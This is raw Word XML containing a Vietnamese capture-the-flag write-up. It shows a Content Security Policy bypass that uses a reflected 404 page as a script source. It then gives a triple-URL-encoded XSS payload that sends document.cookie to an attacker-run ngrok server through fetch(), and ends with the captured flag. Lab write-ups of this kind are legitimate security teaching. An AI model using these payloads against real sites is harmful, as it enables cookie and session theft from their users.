          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong chỉ thị script-src, vì không có source unsafe-inline, chúng ta không thể thực thi được mã Javascript trong thẻ script. Tuy nhiên, nó có source self, chúng ta có thể dùng source này để bỏ qua được chỉ thị CSP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250A2094" w14:textId="1090A3C9" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E81D94" w14:textId="4A11A740" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Đúng vậy chúng ta có thể! Trong trang 404, thẻ &lt;script&gt; có thể chứa trang 404 như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224A1EDD" w14:textId="108ECB3F" w:rsidR="004B5A20" w:rsidRDefault="004B5A20">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5117E3E3" w14:textId="6384E7B3" w:rsidR="004B5A20" w:rsidRPr="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02273">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script src="/alert(document.domain)"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB9A4E7" w14:textId="78F81AD0" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6129A927" w14:textId="05229EAC" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bằng cách này, thẻ script có thể thực thi mã Javascript trong thuộc tính src! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C33278" w14:textId="1F73EE34" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D85F4BE" w14:textId="53FE33A9" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11B78690" wp14:editId="2CBFC53B">
            <wp:extent cx="5943600" cy="22059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14:paraId="5A10C252" w14:textId="0419C10F" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1019F7" w14:textId="4FEB6199" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hmm… Chúng ta có lỗi cú pháp Javascript. Chúng ta mong đợi điều này vì trang error 404 có một số cú pháp Javascript không hợp lệ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C1DC0" w14:textId="2FDE0932" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741390B6" w14:textId="104CEA26" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="579A8E6B" wp14:editId="67D277DB">
            <wp:extent cx="5943600" cy="14681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468120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BF6242" w14:textId="7F53A4A5" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E04022" w14:textId="49925D45" w:rsidR="00E02273" w:rsidRDefault="00E02273">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Để giải quyết được việc này, chúng ta có thể dùng multi-line comment /* và */, </w:t>
      </w:r>
      <w:r w:rsidR="00A71F51">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cũng như single-line comment //:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10F57D" w14:textId="18A67296" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4486A47B" w14:textId="4FD71795" w:rsidR="00A71F51" w:rsidRPr="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A71F51">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script src="/**/alert(document.domain)//"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B07E2F" w14:textId="52E57663" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47FB9F56" w14:textId="476D8940" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ADEACD3" wp14:editId="766CCFD1">
            <wp:extent cx="5943600" cy="3911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11600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50372DB2" w14:textId="642F5F04" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085D10AC" w14:textId="6E3CB2E5" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tuyệt vời! Chúng ta đã bỏ qua được CSP thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A7F2EE" w14:textId="2B1F690E" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F0E1AB2" w14:textId="4ED7AA34" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta có thể trích xuất cookie flag đến máy chủ của kẻ tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A965E8" w14:textId="77B74706" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2CB7E6" w14:textId="417E6E03" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để làm được điều này, chúng ta có thể:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F3A9D" w14:textId="3C88647D" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5783E5E0" w14:textId="4338AE40" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thiết lập một máy chủ HTTP bằng module http.server của Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7081AC55" w14:textId="39BD25FA" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2866AD48" w14:textId="4E25BA92" w:rsidR="00A71F51" w:rsidRPr="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A71F51">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187352F3" w14:textId="1B41FAF0" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D4487AD" w14:textId="5BBDA36C" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chuyển tiếp cổng qua Ngrok để dịch vụ web có thể truy cập từ bên ngoài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15334EFD" w14:textId="6C69F0D6" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37493309" w14:textId="3D2DF1D8" w:rsidR="00A71F51" w:rsidRPr="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A71F51">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ngrok http 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3B119" w14:textId="70CDD43C" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2353FEEE" w14:textId="1F31EDAB" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gửi payload sau đến POST /report:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59777D4E" w14:textId="580EFE6A" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5243039F" w14:textId="1DA2F09C" w:rsidR="00A71F51" w:rsidRPr="005B5437" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost:5000/%25%33%63%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%32%30%25%37%33%25%37%32%25%36%33</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>%25%33%64%25%32%32%25%32%35%25%33%32%25%36%36%25%32%35%25%33%32%25%36%31%25%32%35%25%33%32%25%36%31%25%32%35%25%33%32%25%36%36%25%32%35%25%33%36%25%33%36%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%38%25%32%35%25%33%32%25%33%38%25%32%35%25%33%36%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%34%25%32%35%25%33%37%25%33%34%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%33%25%36%31%25%32%35%25%33%32%25%36%36%25%32%35%25%33%32%25%36%36%25%32%35%25%33%33%25%33%35%25%32%35%25%33%33%25%33%30%25%32%35%25%33%36%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%32%25%36%34%25%32%35%25%33%37%25%36%32%25%32%35%25%33%35%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%34%25%32%35%25%33%37%25%36%34%25%32%35%25%33%32%25%36%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%37%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%32%25%32%35%25%33%32%25%36%34%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%32%25%36%36%25%32%35%25%33%33%25%36%36%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%35%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%34%25%32%35%25%33%37%25%36%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%36%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%36%34%25%32%35%25%33%36%25%33%30%25%32%35%25</w:t>
      </w:r>
      <w:r w:rsidRPr="005B5437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>%33%32%25%33%39%25%32%35%25%33%32%25%36%36%25%32%35%25%33%32%25%36%36%25%32%32%25%33%65%25%33%63%25%32%66%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1214D5" w14:textId="7CB5E71F" w:rsidR="00A71F51" w:rsidRDefault="00A71F51">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697095DB" w14:textId="0A2F5F6C" w:rsidR="00A71F51" w:rsidRPr="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5437">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;script src="/**/fetch(`https://50e6-{Redacted}.ngrok-free.app/?cookie=${document.cookie}`)//"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566C5B12" w14:textId="15EE9B28" w:rsidR="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC30A4B" w14:textId="3BCC003E" w:rsidR="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Payload gốc đã được mã hóa Url đến 3 lần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C321CDF" w14:textId="498A6264" w:rsidR="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CED65D3" w14:textId="105922A1" w:rsidR="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64A64FB9" wp14:editId="39446811">
            <wp:extent cx="5943600" cy="3415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p>
    <w:p w14:paraId="469234C8" w14:textId="4BB6C501" w:rsidR="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB08F08" w14:textId="3106E024" w:rsidR="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5639DDBA" wp14:editId="14483430">
            <wp:extent cx="5943600" cy="824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824230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1A296" w14:textId="4F573C86" w:rsidR="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B9C72E" w14:textId="5FE46C13" w:rsidR="005B5437" w:rsidRPr="005B5437" w:rsidRDefault="005B5437">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B5437">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: SEKAI{w4rmUpwItHoUtTags}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005B5437" w:rsidRPr="005B543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5E37"/>
    <w:rsid w:val="002017FB"/>
    <w:rsid w:val="00221E9A"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="004319D7"/>
    <w:rsid w:val="004B5A20"/>
    <w:rsid w:val="004B5E37"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00595413"/>
    <w:rsid w:val="005B5437"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="0065053B"/>
    <w:rsid w:val="00676EB4"/>
    <w:rsid w:val="006F6780"/>
    <w:rsid w:val="007938F8"/>
    <w:rsid w:val="00A71F51"/>
    <w:rsid w:val="00B356FD"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00E0227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019E583"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5D3D0332-B463-4F41-8729-9B93A20C2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10</Pages>
  <Words>782</Words>
  <Characters>4458</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2024-09-03T03:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-06T14:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>